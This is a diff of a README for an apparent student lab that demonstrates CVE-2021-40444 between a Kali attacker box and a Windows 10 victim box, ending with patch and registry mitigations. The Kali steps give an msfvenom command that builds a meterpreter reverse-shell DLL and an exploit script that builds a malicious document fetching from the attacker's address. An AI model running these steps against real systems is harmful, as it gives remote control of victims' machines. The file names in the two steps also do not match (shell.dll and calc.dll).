Jeromeyoung/TIC4301_Project/README.md

   4. vagrant init victim_package.box
   5. vagrant up

-Setup:
-  Win10:
+Setup (win10):
   1. In the win10 box, log in as administrator with the password vagrant.
   2. Right click script.ps1 on the desktop and run with powershell.
 (Leave this open)
   3. Run ipconfig.exe and obtain the address for this host.

-  Kali:
+Setup (Kali):
 1. cd Desktop/CVE-2021-40444.
 2. generate your malicious dll with msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
 3. start a listener in metasploit.
 4. generate the malicious document. # python3 exploit.py generate test/calc.dll http://<kali IP>
   5. visit http://<win 10 IP>/upload and upload the file.
   6. listen for the shell.

 Mitigations:
   1. Install KB5005565 hotfix.
   2. Edit windows registry with patch.reg in the repository.